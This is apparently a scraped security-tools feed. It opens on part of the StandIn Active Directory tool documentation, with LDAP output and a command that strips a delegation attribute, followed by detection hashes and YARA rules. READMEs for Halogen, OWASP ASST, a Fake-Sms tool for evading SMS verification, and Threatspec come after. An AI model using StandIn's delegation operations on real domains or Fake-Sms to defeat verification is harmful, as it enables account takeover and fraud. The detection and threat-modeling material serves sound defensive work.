|_ 0
[+] objectcategory
|_ CN=Computer,CN=Schema,CN=Configuration,DC=main,DC=redhook,DC=local
[+] iscriticalsystemobject
|_ False
[+] operatingsystem
|_ Windows 10 Enterprise
[+] usnchanged
|_ 195771
[+] instancetype
|_ 4
[+] name
|_ M-10-1909-03
[+] badpasswordtime
|_ 7/9/2020 5:07:11 PM UTC
[+] pwdlastset
|_ 10/29/2020 6:44:08 PM UTC
[+] serviceprincipalname
|_ TERMSRV/M-10-1909-03
|_ TERMSRV/m-10-1909-03.main.redhook.local
|_ WSMAN/m-10-1909-03
|_ WSMAN/m-10-1909-03.main.redhook.local
|_ RestrictedKrbHost/M-10-1909-03
|_ HOST/M-10-1909-03
|_ RestrictedKrbHost/m-10-1909-03.main.redhook.local
|_ HOST/m-10-1909-03.main.redhook.local
[+] objectclass
|_ top
|_ person
|_ organizationalPerson
|_ user
|_ computer
[+] badpwdcount
|_ 0
[+] samaccounttype
|_ SAM_MACHINE_ACCOUNT
[+] lastlogontimestamp
|_ 10/29/2020 12:29:26 PM UTC
[+] usncreated
|_ 31127
[+] objectguid
|_ c02cff97-4bfd-457c-a568-a748b0725c2f
[+] localpolicyflags
|_ 0
[+] whencreated
|_ 7/9/2020 5:05:08 PM
[+] adspa th
|_ LDAP://CN=M-10-1909-03,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local
[+] useraccountcontrol
|_ WORKSTATION_TRUST_ACCOUNT
[+] cn
|_ M-10-1909-03
[+] countrycode
|_ 0
[+] primarygroupid
|_ 515
[+] whenchanged
|_ 11/2/2020 7:55:14 PM
[+] operatingsystemversion
|_ 10.0 (18363)
[+] dnshostname
|_ m-10-1909-03.main.redhook.local
[+] dscorepropagationdata
|_ 10/30/2020 6:56:30 PM
|_ 10/30/2020 10:55:22 AM
|_ 10/29/2020 4:58:51 PM
|_ 10/29/2020 4:58:29 PM
|_ 1/1/1601 12:00:01 AM
[+] lastlogon
|_ 11/2/2020 9:07:20 AM UTC
[+] distinguishedname
|_ CN=M-10-1909-03,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local
[+] msds-supportedencryptiontypes
|_ RC4_HMAC, AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96
[+] samaccountname
|_ M-10-1909-03$
[+] objectsid
|_ S-1-5-21-1293271031-30535 86410-2290657902-1127
[+] lastlogoff
|_ 0
[+] msds-allowedtoactonbehalfofotheridentity
|_ BinLen : 36
|_ AceQualifier : AccessAllowed
|_ IsCallback : False
|_ OpaqueLength : 0
|_ AccessMask : 983551
|_ SID : S-1-5-21-1293271031-3053586410-2290657902-1205
|_ AceType : AccessAllowed
|_ AceFlags : None
|_ IsInherited : False
|_ InheritanceFlags : None
|_ PropagationFlags : None
|_ AuditFlags : None
[+] accountexpires
|_ 0x7FFFFFFFFFFFFFFF

Remove msDS-AllowedToActOnBehalfOfOtherIdentity

Use Case

With write access to a machine object this function allows the operator to remove a previously added msDS-AllowedToActOnBehalfOfOtherIdentity property from the machine.


Syntax

Remove previously created msDS-AllowedToActOnBehalfOfOtherIdentity property from a machine.

C:\> StandIn.exe --computer m-10-1909-03 --remove

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object : CN=M-10-1909-03
Path : LDAP://CN=M-10-1909-03,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local
[+] msDS-AllowedToActOnBehalfOfOtherIdentity property removed..

Detection

This outlines a number of IOC's which can aid in the detection engineering process for StandIn.


Release Package Hashes

The following table maps the release package hashes for StandIn.

-=v0.8=-
StandIn_Net35.exe SHA256: A0B3C96CA89770ED04E37D43188427E0016B42B03C0102216C5F6A785B942BD3
MD5: 8C942EE4553E40A7968FF0C8DC5DB9AB

StandIn_Net45.exe SHA256: F80AEB33FC53F2C8D6313A6B20CD117739A71382C208702B43073D54C9ACA681
MD5: 9E0FC3159A6BF8C3A8A0FAA76F6F74F9

-=v0.7=-
StandIn_Net35.exe SHA256: A1ECD50DA8AAE5734A5F5C4A6A951B5F3C99CC4FB939AC60EF5EE19896CA23A0
MD5: 50D29F7597BF83D80418DEEFD360F093

StandIn_Net45.exe SHA256: DBAB7B9CC694FC37354E3A18F9418586172ED6660D8D205EAFFF945525A6A31A
MD5: 4E5258A876ABCD2CA2EF80E0D5D93195

Yara

The following Yara rules can be used to detect StandIn on disk, in it's default form.

rule StandIn
{
meta:
author = "Ruben Boonen (@FuzzySec)"
description = "Detect StandIn string constants."

strings:
$s1 = "StandIn" ascii wide nocase
$s2 = "(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2))" ascii wide nocase
$s3 = "msDS-AllowedToActOnBehalfOfOtherIdentity" ascii wide nocase
$s4 = ">--~~--> Args? <--~~--<" ascii wide nocase

condition:
all of ($s*)
}

rule StandIn_PDB
{
meta:
author = "Ruben Boonen (@FuzzySec)"
description = "Detect StandIn default PDB."

strings:
$s1 = "\\Release\\StandIn.pdb" ascii wide nocase

condition:
all of ($s*)
}

SilktETW Microsoft-Windows-DotNETRuntime Yara Rule

The Yara rule below can be used to detect StandIn when execution happens from memory. To use this rule, the EDR solution will require access to the Microsoft-Windows-DotNETRuntime ETW data provider. For testing purposes, this rule can be directly evaluated using SilkETW. It should be noted that this is a generic example rule, production alerting would required a more granular approach.

rule Silk_StandIn_Generic
{
meta:
author = "Ruben Boonen (@FuzzySec)"
description = "Generic Microsoft-Windows-DotNETRuntime detection for StandIn."

strings:
$s1 = "\\r\\nFullyQualifiedAssemblyName=0;\\r\\nClrInstanceID=StandIn" ascii wide nocase
$s2 = "MethodFlags=Jitted;\\r\\nMethodNamespace=StandIn." ascii wide nocase

condition:
any of them
}


Halogen - Automatically Create YARA Rules From Malicious Documents

$
0
0


Halogen is a tool to automate the creation of yara rules against image files embedded within a malicious document.


Halogen help
python3 halogen.py -h
usage: halogen.py [-h] [-f FILE] [-d DIR] [-n NAME] [--png-idat] [--jpg-sos]

Halogen: Automatically create yara rules based on images embedded in office
documents.

optional arguments:
-h, --help show this help message and exit
-f FILE, --file FILE File to parse
-d DIR, --directory DIR
directory to scan for image files.
-n NAME, --rule-name NAME
specify a custom name for the rule file
--png-idat For PNG matches, instead of starting with the PNG file
header, start with the IDAT chunk.
--jpg-sos For JPG matches, skip over the header and look for the
Start of Scan marker, and begin the match there.

Testing it out

We've included some test document files with embedded images for you to test this out with. Running python3 halogen/halogen.py -d tests/ > /tmp/halogen_test.yara will produce the test yara file containing all images found within the files inside the tests/ directory.
>From here you can run yara -s /tmp/halogen_test.yara tests/ and observe which images match which files.


Notes
  1. We use two patterns for JPG matching. One is less strict to the typical JPG file header, and we use this because we've seen some malicious files use this format. If Halogen finds both, it'll default to writing out the more strict match. Typically, these have the same matching content, so no detection really gets missed.
  2. For PNG files you can choose to start by default at the file header, or with --png-idat you can start at the IDAT chunk found within a PNG file. We also reduced the bytes returned when matching on the IDAT chunk.
  3. Similar to the above, you can start JPG matches at the Start of Scan marker by using the --jpg-sos flag.

Contributing

Please contribute pull requests in python3, and submit any bugs you find as issues.



OWASP ASST (Automated Software Security Toolkit) - A Novel Open Source Web Security Scanner

$
0
0


OWASP ASST (Automated Software Security Toolkit) | A Novel Open Source Web Security Scanner.

Note: AWSS is the older name of ASST


Introduction

Web applications have become an integral part of everyday life, but many of these applications are deployed with critical vulnerabilities that can be fatally exploited. As the technology used to develop these applications become sophisticated, so do the attackers’ techniques. Attackers no longer need physical access to the victims, they can attack more than one at the same time and the possibility of being caught and brought to justice is minimal. Automated web vulnerability scanners have been heavily used to assess the security of web applications. They can improve the efficiency of vulnerability scanning compared to traditional manual vulnerability detection that are time-consuming, labor-intensive, and inefficient. There are a lot of web vulnerability scanners on the Internet, however, they do not explain the possible attack and how to have counter- measurements against it. We designed and implemented a new automated web vulnerability scanner called Automated Software Security Toolkit (ASST), which scans a web project’s source code and generates a report of the results with detailed explanation about each possible vulnerability and how to secure against it. We have tested the performance of ASST, and compared its results with other major open source vulnerability scanners. Our results show that ASST can identify web software security vulnerabilities more comprehensively and accurately.

NOTE: It is Still under development, Please, report for any error you get.


What is ASST?

ASST is an Open Source, Source Code Scanning Tool, it is a CLI (Command Line Interface) application, developed with JavaScript (Node.js framework).

Currently concentrates on PHP and MySQL programming languages, but since its core functionalities are ready and available for everyone, programmers can contribute and add plugins or extensions to it, to add features and make it scan for other programming languages such as Java, C#, Python, etc.., and their frameworks. So its infrastructure is designed to be contributed with other programmers to make it better and more novel.

The best of our knowledge, ASST is the only tool that scans PHP language according to OWASP Top 10 Web Application Security Risks.


How ASST Teaches Developers of How to Secure their Codes ?

When ASST scans for a project it checks each and every file line by line for security vulnerabilities. If a vulnerability was detected, it will alert in the report at which line in which file a vulenrability was detected and a "Click Here" link to explain the attack and how to secure against it.

ASST's results are showed as HTML Report linked with PDF files to explain each attack and its protection mechanism.


How to Contribute?
  • ASST can be easily extended to support other programming languages that may be scanned for vulnerabilities. The project is open source therefore, programmers with expertise in cyber security can contribute or fork the toolkit and add features. Other programming languages such as Python, C#, Java or Node.js itself can be added to be scanned for vulnerabilities as backend server code.

  • If you are a security experienced developer, you can contribute to make this current version better, or you can contribute into adding new programming languages to be scanned. But there are rules needs to be followed while improving it:

  1. The Core codes shouldn’t be changed, while you can suggest for better ones or adding new ones to be used if well justified its need.
  2. A specific Language Core Code can be changed if it can be made better.
  3. If you want to add a new language, you need to follow the same code design and file structure of the project.

How to install and run it?

To let ASST work 100%, you will need to install:

  1. localhost on your PC, we recommend (XAMPP).
  2. Node.js Engine v12.13.0
  • The best usage of ASST is to run it directly on Online Production Server, and scan the project(s) in it. because ASST also checks Server's PHP and MySQL Versions if they are outdated or not.

A) Install ASST On Windows

Full Video of how to run ASST on Windows: https://youtu.be/FKxDa3zYz1E


1. XAMPP on Windows

You can download XAMPP for windows from here: https://www.apachefriends.org/download.html choose the version of PHP that suits your project, if you don't know which version to pick, just pick the first one for windows.

After downloading and installing XAMPP (Next, Next, Next, Finish), run XAMPP Control Panel, you can type XAMPP in Start Menu Search Field then you will see it, run it, Next To Apache and MySQL labels press start (two buttons).


PS:
  1. Make sure your PC doesn't have Virtual Machine program installed because XAMPP and Virtual Machine get conflicted on Ports, you will have to force close the VM background services using Task Manager (Google it, if you don't know what i am talking about).

  2. Make sure Skype program is closed (Even from the tray bar), because they also get conflicted on Ports, you can run skype after you start XAMPP.

Place your Project's folder in htdocs: default: "C:\xampp\htdocs\YourProjectFolderName"

Open browser, type: localhost/phpmyadmin, create empty database, import your project_database.sql file to it, open your project's folder and change your project's config file to connect to MySQL's localhost: default configs are: host: "localhost" or "127.0.0.1", username: "root", password: "" (Empty_String), database name: "dbname_you_chose_in_phpmyadmin"


2. Node.js on Windows

You must download a specific version of Node.js for windows from here: https://nodejs.org/en/blog/release/v12.13.0/ select (Windows 64-bit Installer), then download, Next, Next, Next and Finish.

We are not keeping up with nodejs upgrades every month, so if you would like to test it on your own, you can download latest node.js version from here: https://nodejs.org/en/download/ choose (Windows Installer (.msi)), download and run it, Next, Next, Next and Finish.


PS: Downloading latest Node.js Engine may require you to update ASST's modules, so if you know what you are doing and you have time, and want to contribute, you can report your latest version of node.js and update modules and ask us to commit it on the repo if it works.

3. Run ASST on Windows

Download and Extract ASST's project from this github page, rename the folder to "ASST" only, not "ASST-main", move ASST's folder next to your web project to scan it, default: "C:\xampp\htdocs\ASST"


Configurations:
  1. Open config.js inside ASST's folder and set the name of your Web Project's folder to be scanned in DEFAULT_PROJECT_PATH_TO_SCAN variable.

  2. Open config_php_lang.js inside ASST's folder: if you are using MySQL you must set the variables as explained in the file, if you are not using MySQL, just set IS_DBMS_USED variable to false, and ignore the rest, note that PHP_EXE_BIN_PATH is set to XAMPP's default location, so change it if you are using different PHP binary or different XAMPP location.


PS: The two config files are well explained of what to change to suit your project.

Double click on ASST.bat to run it. if it gets blocked by Windows Defender Smart Screen, allow it by clicking on More Info then Run or Run Anyway, or you can just run it using CMD command.

default CMD command to run ASST:

$ node C:\xampp\htdocs\ASST\main.js


B) Install ASST On Linux (Ubuntu)

Full Video of how to run ASST on Ubuntu: https://youtu.be/XrAB8_BHxfo


1. XAMPP on Ubuntu

Using a web browser, open this link: https://www.apachefriends.org/download.html and look for "XAMPP for Linux" section, choose the PHP version that suits your project and download it, if you don't know which version to pick, just pick the first one. Or you can download XAMPP through terminal using "wget" command(tool), but you will need to have and know the correct url version to download.

Now working in Terminal:

$ cd Downloads

$ ls

You should see the XAMPP setup file you downloaded.

$ sudo chmod +x xampp-linux-*

$ sudo ./xampp-linux-*

Wait a second for the setup to run, then follow the instructions. After downloading and installing XAMPP, run it.

$ sudo /opt/lampp/lampp start

Place your Project's folder in htdocs: default: "/opt/lampp/htdocs/YourProjectFolderName"

Open browser, type: localhost/phpmyadmin, create empty database, import your project_database.sql file to it, open your project's folder and change your project's config file to connect to MySQL's localhost: default configs are: host: "localhost" or "127.0.0.1", username: "root", password: "" (Empty_String), database name: "dbname_you_chose_in_phpmyadmin"


2. Node.js on Ubuntu

$ sudo apt-get install nodejs -y

$ sudo apt-get install npm -y

You must set a specific version of Node.js to let ASST works without any problem.

$ sudo npm install n -g

$ sudo n 12.13.0

We are not keeping up with nodejs upgrades every month, so if you would like to test it on your own, you can ignore the last two commands of installing "n" using npm


PS: Using latest Node.js Engine may require you to update ASST's modules, so if you know what you are doing and you have time, and want to contribute, you can report your latest version of node.js and update modules and ask us to commit it on the repo if it works.

3. Run ASST on Ubuntu

Download and Extract ASST's project from this github page, using a browser, wget or git, rename the folder to "ASST" only, not "ASST-main", move ASST's folder next to your web project to scan it, default: "/opt/lampp/htdocs/ASST"


Configurations:
  1. Open config.js inside ASST's folder using nano, vim or text editor and set the name of your Web Project's folder to be scanned in DEFAULT_PROJECT_PATH_TO_SCAN variable.

  2. Open config_php_lang.js inside ASST's folder: if you are using MySQL you must set the variables as explained in the file, if you are not using MySQL, just set IS_DBMS_USED variable to false, and ignore the rest, note that PHP_EXE_BIN_PATH is set to XAMPP's default location, so change it if you are using different PHP binary or different XAMPP location.


PS: The two config files are well explained of what to change to suit your project.

To run ASST, default command:

$ sudo node /opt/lampp/htdocs/ASST/main.js


C) Install ASST On MacOSX

Full Video of how to run ASST on MacOSX: https://youtu.be/IThRZEQVa7M


1. XAMPP on MacOSX

Using a web browser, open this link: https://www.apachefriends.org/download.html and look for "XAMPP for OSX" section, choose the PHP version that suits your project and download it, if you don't know which version to pick, just pick the first one.

Open Downloads Folder and double click on the xampp-osx-.dmg file you downloaded. then install: Next, Next, Next, Finish.

After installation, open Applications Folder using Finder and open XAMPP folder, click on manager-osx.app to open XAMPP Control Panel, click on Manage Servers tab then click Start All button.

Place your Project's folder in htdocs:

  1. Using Finder, open Applications then navigate to XAMPP folder then htdocs, then place your Project there.
  2. You can use terminal: default location /Applications/XAMPP/htdocs/YourProjectFolderName

Open browser, type: localhost/phpmyadmin, create empty database, import your project_database.sql file to it, open your project's folder and change your project's config file to connect to MySQL's localhost: default configs are: host: "localhost" or "127.0.0.1", username: "root", password: "",(Empty_String), database name: "dbname_you_chose_in_phpmyadmin"


2. Node.js on MacOSX

There are several ways to download and install Node.js on MacOSX specified here: https://nodejs.org/en/download/package-manager/#macos

We used: brew (package system), Open Terminal:

$ sudo /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)"

$ sudo brew install node

You must set a specific version of Node.js to let ASST works without any problem.

$ sudo npm install n -g

$ sudo n 12.13.0

We are not keeping up with nodejs upgrades every month, so if you would like to test it on your own, you can ignore the last two commands of installing "n" using npm


PS: Using the latest Node.js Engine may require you to update ASST's modules, so if you know what you are doing and you have time, and want to contribute, you can report your latest version of node.js and update modules and ask us to commit it on the repo if it works.

3. Run ASST on MacOSX

Download and Extract ASST's project from this github page, using a browser or git, rename the folder to "ASST" only, not "ASST-main", move ASST's folder next to your web project to scan it, default: "/Applications/XAMPP/htdocs/ASST"


Configurations:
  1. Open config.js inside ASST's folder using text editor, put the name of your Web Project's folder to be scanned in DEFAULT_PROJECT_PATH_TO_SCAN variable.

  2. Open config_php_lang.js inside ASST's folder: if you are using MySQL you must set the variables as explained in the file, if you are not using MySQL, just set IS_DBMS_USED variable to false, and ignore the rest, note that PHP_EXE_BIN_PATH is set to XAMPP's default location, so change it if you are using different PHP binary or different XAMPP location.


PS: The two config files are well explained of what to change to suit your project.

To run ASST, default command:

$ sudo node /Applications/XAMPP/htdocs/ASST/main.js


Special Thanks

Special Thanks to:

  1. Assist. Prof. Dr. Ece Gelal Soyak: https://scholar.google.com.tr/citations?user=w-RBj5QAAAAJ&hl=en
  2. Assist. Prof. Dr. Selçuk Baktır: https://scholar.google.com/citations?user=iwR7YF8AAAAJ&hl=en
  3. Assist. Prof. Dr. Özgül Küçük: https://scholar.google.com/citations?user=qJJSkrAAAAAJ&hl=en
  4. OWASP Foundation

For making this toolkit possible by providing their guidance and help.



Fake-Sms - A Simple Command Line Tool Using Which You Can Skip Phone Number Based SMS Verification By Using A Temporary Phone Number That Acts Like A Proxy

$
0
0


A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.

Note-1: This is just an experimental tool, do not use this in any banking transactions. Unethical use of this tool is strictly not encouraged."

Note-2: The tool uses upmasked, A Eurpoean service provider, data will be stored on their servers, make sure you agree to EU Data governance laws and GDPR. I recommend you not to use this for any personal transaction which reveals your identity.


Features:
  • Written in Go-1.15 (with modules support enabled)
  • Provides an interactive CLI, which is easier to use.
  • Provides a local file based DB to save and manage a list of fake phone numbers to help you remember and reuse.
  • Unofficial client of upmasked

Requirements:
  • Go programming language - 1.15+

To build:

The build process is simple, it is just like building any other Go module. Follow the steps below:

export GOBIN=$PWD/bin
go install

This will build the binary and place it in bin/. You can also consider using the pre-built binary which is available under bin/


Steps to use:
  1. Register a number in local DB: You can register a number by selecting one of the available numbers as shown below.


  1. Get the messages from any registered number: You can select a number which was saved in step-1 and view its messages as a list. The tool will also save the dump as json in the format ${PWD}/selected-phone-number.json. As shown below:


  1. Optionally, you can choose to delete the rembered numbers or list them.

Acknowledgements

The similar tool is also available in pure shell script. Check this out.


Contributing

The tool is very simple and I don't think there is any major feature missing. But I would welcome any kind of suggestion, enhancements or a bug-fix from the community. Please open an issue to discuss or directly make a PR!!



Threatspec - Continuous Threat Modeling, Through Code

$
0
0


Threatspec is an open source project that aims to close the gap between development and security by bringing the threat modelling process further into the development process. This is achieved by having developers and security engineers write threat modeling annotations as comments inside source code, then dynamically generating reports and data-flow diagrams from the code. This allows engineers to capture the security context of the code they write, as they write it. In a world of everything-as-code, this can include infrastructure-as-code, CI/CD pipelines, and serverless etc. in addition to traditional application code.


Getting started

Step 1 - Install threatspec
$ pip install threatspec

You'll also need to install Graphviz for the report generation.


Step 2 - Initialise threatspec in your code repository
$ threatspec init
Initialising threatspec...

Threatspec has been initialised. You can now configure the project in this
repository by editing the following file:

threatspec.yaml

You can configure threatspec by editing the threatspec.yaml configuration file which looks something like this:

# This file contains default configuration for a threatspec-enabled repository
# Warning: If you delete this file, threatspec will treat this directory as a normal source path if referenced by other threatspec.yaml files.

project:
name: "threatspec project" # Name of your project. This might be you application name or a friendly name for the code repository.
description: "A threatspec project." # A description of the project. This will be used in the markdown report as well as the name.
imports: # Import other threatspec projects into this one.
- './' # Current directory isn't strictly necessary as this is processed anyway. Just here as an example.
paths: # Source code paths to process
- './' # Parse source files in the current directory by default.
# - 'path/to/repo1' # You c an refer to other repositories or directories as needed
# - 'path/to/repo2' # ... and you can do this as much as you like
# - 'path/to/source/file.go' # You can directly reference source code files and directories
# - path: 'path/to/node_source # You can also provide ignore paths for a path by providing a dictionary
# ignore: # Any sub-paths defined in this array are ignored as source files within the path are recursively parsed
# - 'node_modules'
# - path: 'path/to/config.py'
# mime: 'text/x-python' # You can explicitly set the mime type for files if needed


Step 3 - Annotate your source code with security concerns, concepts or actions
// @accepts arbitrary file writes to WebApp:FileSystem with filename restrictions
// @mitigates WebApp:FileSystem against unauthorised access with strict file permissions
func (p *Page) save() error {
filename := p.Title + ".txt"
return ioutil.WriteFile(filename, p.Body, 0600)
}

Step 4 - Run threatspec against your source code
$ threatspec run
Running threatspec...

Threatspec has been run against the source files. The following threat mode file
has been created and contains the mitigations, acceptances, connections etc. for
the project:

threatmodel/threatmodel.json

The following library files have also been created:

threatmodel/threats.json threatmodel/controls.json threatmodel/components.json


Step 5 - Generate the threat model report
$ threatspec report
Generating report...
The following threat model visualisation image has been created: ThreatModel.md.png
The following threat model markdown report has been created: ThreatModel.md

Example report



See https://github.com/threatspec/threatspec_example_report.


Getting help

For more information, use the command line help flag.

$ threatspec --help
Usage: threatspec [OPTIONS] COMMAND [ARGS]...

threatspec - continuous threat modeling, through code

threatspec is an open source project that aims to close the gap between
development and security by bringing the threat modelling process further
into the development process. This is achieved by having developers and
...

Annotating your code

Supported file types

At the heart of threatspec there is a parser that reads source code files and processes any annotations found in those files. It uses a Python library called comment_parser to extract those comments. The comment_parser library determines the file's MIME type in order to know which type of comments need to be parsed. The supported file MIME types are:

LanguageMime String
Ctext/x-c
C++/C#text/x-c++
Gotext/x-go
HTMLtext/html
Javatext/x-java-source
Javascriptapplication/javascript
Shelltext/x-shellscript
XMLtext/xml

An unknown MIME type will result in a warning and the file will be skipped.

See https://github.com/jeanralphaviles/comment_parser for details.

In addition to these, threatspec will also soon parse the following files natively:

  • YAML
  • JSON
  • Plain text

If the MIME type for a file can't be determined, or if it is incorrect, you can override the MIME type for a path in the threatspec.yaml configuration file.


Comment types

There are four main comment types supported by threatspec.


Single-line

A single-line comments are the most common use-case for threatspec as they allow you to capture the necessary information as close as possible to the code. An example would be

// @mitigates WebApp:FileSystem against unauthorised access with strict file permissions
func (p *Page) save() error {

Multi-line

If you want to capture multiple annotations in the same place, you could use multiple single-line comments. But you can also use multi-line comments instead:

/*
@accepts arbitrary file writes to WebApp:FileSystem with filename restrictions
@mitigates WebApp:FileSystem against unauthorised access with strict file permissions
*/
func (p *Page) save() error {
filename := p.Title + ".txt"
return ioutil.WriteFile(filename, p.Body, 0600)
}

More importantly, if you want to use the extended YAML syntax (see below), you'll need to use multi-line comments:

/*
@mitigates WebApp:FileSystem against unauthorised access with strict file permissions:
description: |
The file permissions 0600 is used to limit the reading and writing of the file to the user and root.
This prevents accidental exposure of the file content to other system users, and also protects against
malicious tampering of data in those files. An attacker would have to compromise the server's user
in order to modify the files.
*/
func (p *Page) save() error {
filename := p.Title + ".txt"
return ioutil.WriteFile(filename, p.Body, 0600)
}

Inline

You can add comments to the end of lines that also contain code. This can be useful, but might result in rather long lines. Probably best to use these for @review annotations.

        err = ioutil.WriteFile("final-port.txt", []byte(l.Addr().String()), 0644) // @review WebApp:Web Is this a security feature?

YAML and JSON

Finally, the last comment type isn't really a comment at all. Rather, it's addtional keys in JSON or YAML data files using the x-threatspec extension key. This was primarily chosen to be compatible with OpenAPI/Swagger files but might work in other circumstances. The rest of the threatspec annotation is essentially the same. So a very simple example would be something like:

servers:
- url: http://petstore.swagger.io/v1
x-threatspec: "@exposes Petstore:Web to Man in the Middle (#mitm) with lack of TLS"

A more complete example using the extended syntax just uses the threatspec annotation as a key:

    post:
summary: Create a pet
operationId: createPets
tags:
- pets
x-threatspec:
"@exposes Petstore:Pet:Create to Creation of fake pets with lack of authentication":
description: "Any anonymous user can create a pet because there is no authentication and authorization"

Summary of annotations

Here is a quick summary of each supported annotation type. For a full description, see the Annotations section below.

AnnotationExample
@component - a hierarchy of components within the application or service.@component MyApp:Web:Login
@threat - a threat@threat SQL Injection (#sqli)
@control - a mitigating control@control Web Application Firewall (#waf)
@mitigates - a mitigation against a particular threat for a component, using a control@mitigates MyApp:Web:Login against Cross-site Request Forgery with CSRF token generated provided by framework
@exposes - a component is exposed to a particular threat@exposes MyApp:CICD:Deployment to rogue code changes with lack of separation of duty
@accepts - the acceptance of a threat against a component as unmitigated@accepts #api_info_diclosure to MyService:/api with version information isn't sensitive
@transfers - a threat is transferred from one component to another@transfers auth token exposed from MyService:Auth:#server to MyService:Auth:#client with user must protect the auth token
@connects - a logical, data or even physical connection from one component to another@connects MyService:Product:Search to MyService:Product:Basket with Add selected product to basket
@tests - the test of a control for a component@tests CSRF Token for MyService:Web:Form
@review - a note for a component to be reviewed later@review Web:Form Shouldn't this mask passwords?

Custom data using YAML

Threatspec now supports an extended syntax which uses YAML. This allows you to provide additional data that can then be used in reports, or any other processing of the JSON files. There is one special description field that is supported by default and is used by the default reporting if provided. As in the above example, you can use description to provide any additional context using a multi-line comment:

/*
@mitigates WebApp:FileSystem against unauthorised access with strict file permissions:
description: |
The file permissions 0600 is used to limit the reading and writing of the file to the user and root.
This prevents accidental exposure of the file content to other system users, and also protects against
malicious tampering of data in those files. An attacker would have to compromise the server's user
in order to modify the files.
*/
func (p *Page) save() error {
filename := p.Title + ".txt"
return ioutil.WriteFile(filename, p.Body, 0600)
}

You can also add any other data fields you like, which can then be used in custom reports. For example:

/*
@exposes WebApp:App to XSS injection with insufficient input validation:
description: An attacker can inject malicious javascript into the web form
impact: high
owner: Engineering
ref: #TRACKER-123

func editHandler(w http.ResponseWriter, r *http.Request, title string) {
p, err := loadPage(title)
if err != nil {
p = &Page{Title: title}
}
renderTemplate(w, "edit", p)
}

Ways of capturing information

There are two main use-cases for using threatspec, and so threatspec can be used in a couple of different ways.


Capturing key information in the moment while writing code

The first use-case is as a developer (or other engineer) writing code, and wanting to capture security context such as possible threats, decisions, questions, assumptions etc. As you're in the middle of writing code, you might not have the full big-picture context immediately available, but you want to quickly capture important information there and then, with minimal effort. Threatspec does this by keeping you in the IDE, thereby minimising context switching and delays.

The free-text style of threatspec annotations are ideally suited for this case. Let's say you are writing a database query and are using parameterised queries. It's possible that you're doing this simply because you've been told its best practice. But you're clever and you know its best practice because it helps to mitigate against threats like SQL injection. Without having the full context in your head, you quickly write the comment:

// @mitigates MyApp:Web:Backend against SQL Injection with use of parameterised queries

You've now captured a very important security decision, with minimal effort. This can now be displayed in the much wider context by generating a report. What threatspec does when it parses your comment is turn each of the elements into identifiers. You don't have to know about these identifiers right now, as you're just capturing key information.

For example, the SQL Injection threat above would have the identifier #sql_injection. Now, if somewhere else in your project somebody has already created a SQL injection threat, but they used the identifier #sqli then that's fine. There will be some duplication, but you can quickly spot that in the report and iterate to reduce the duplications. But most importantly, you capture the necessary information in a meaningful and efficient way. The big-picture view will naturally emerge and evolve over time with the code base.


Capturing data in structured threat modeling sessions

The other use case for threatspec is as a way to capture information in threat modeling sessions. Let's say you to get together as a team before starting work on a new feature. This threat modeling session will serve as a design and architecture session as well as for thinking about threats. You'll probably start off sketching designs and architectures on a whiteboard, and so you'll want to start capturing key components as they're discussed. Threatspec lets you do this in any IDE, just by using a plaintext file:

@component External:User (#user)
@component MyApp:Web:LoadBalancer (#lb)
@component MyApp:Web:WebServer (#web)
@component MyApp:API:Product (#product_api)
@component MyApp:API:Users (#users_api)

Running threatspec report at this stage will already generate a visual hierarchy of the components. You'll probably want to make logical, data flow or other connections between the components as well. So you might capture something like:

@connects #user to #lb with HTTPS
@connects #lb to #web with HTTPS
@connects #user to #product_api with Product Search
@connects #user to #users_api with User Management

Now that a bit of an architecture or data flow is starting to emerge, it's probably a good time to start thinking about potential threats. As this is a structured session, it's a great opportunity to write the threats in a more structured way that can evolve into a library of threats. Capturing the threats in the same file might look something like this:

# Threats

@threat Authentication Info Disclosure (#auth_info_disclosure):
description: An attacker can obtain information about existing users to the system

@threat Expensive Query Denial of Service (#query_dos):
description: An attacker can submit many queries that are expensive for the backend service to run
resulting in a denial of service for that service.

# Exposures

@exposes #users_api to #auth_info_disclosure with broken role based access control
description: |
If an authentication and authorization model is broken, and attacker might be able to
retrieve information about other users from the Users API.

@exposes #product_api to #query_dos with suboptimal product search query:
description: The way product queries is done is inefficient and a large number c ould easily take down the service.

Running threatspec report now will start to look like a traditional threat model document. The difference is that as you start adding to your code base, you can start moving the annotations to the relevant code classes and functions so that the threat model continues to stay in sync. And if the architecture changes, that's no problem either. The generated report will always reflect what has been documented in the code.


Skipping annotations

To stop an annotation from being parsed and reported on, you can put a string in front of the @action tag. Any string will do, but we suggest you use the word @skip so it's easy to search for.

// @skip @transfers @cwe_319_cleartext_transmission from WebApp:Web to User:Browser with non-sensitive information
func main() {

Running threatspec

So far we've looked at how threatspec can be embedded within source files. This section looks at how threatspec can be used within code repositories and even across repositories.


In a single repository

When you first use threatspec, you'll likely initialise it in a code repository that you're just starting or have already been working on, rather than creating a new repository specifically for threatspec. This allows you to quickly get started with using threatspec in an evolving code base. Using the threatspec.yaml configuration file you can tweak how the various paths within the repository are processed.


Across multiple repositories

As your code base or use of threatspec grows, you may need to generate the bigger threat modeling picture from multiple repositories. These could be different repositories for the same application, but could also be entirely different applications. Or, a mixture of application and infrastructure deployment repositories. At this stage you may want to create a new repository specifically for threatspec that has a configuration file that points to various other repositories. When threatspec processes the imports section of the configuration file, it loads the threat model and library files from each import path. This allows you to "glue" multiple repositories together into a single view.

Let's say you had the following repositories, each containing a threatspec.yaml file and annotations within their source files:

  • src/myapp-api
  • src/myapp-web
  • src/myapp-deployment
  • src/auth-service

In this example, auth-service would be a service shared across the organisation. You could create a new repository called src/myapp-threatmodel containing the following threatspec.yaml file:

project:
name: MyApp
description: My Application Service
imports:
- ../myapp-api
- ../myapp-web
- ../myapp-deployment
- ../auth-service
paths:
- ./

Running threatspec in the myapp-threatmodel repo would generate a threat model report across the entire MyApp code base, but also including the auth service.


Generating reports

Report generation in threatspec is there to allow you to take a step back and look at the wider context. This allows the bigger picture to naturally and organically emerge from the more day-to-day tactical decisions and assumptions. There's no fixed point at which you have to generate the report, but some suggestions are:

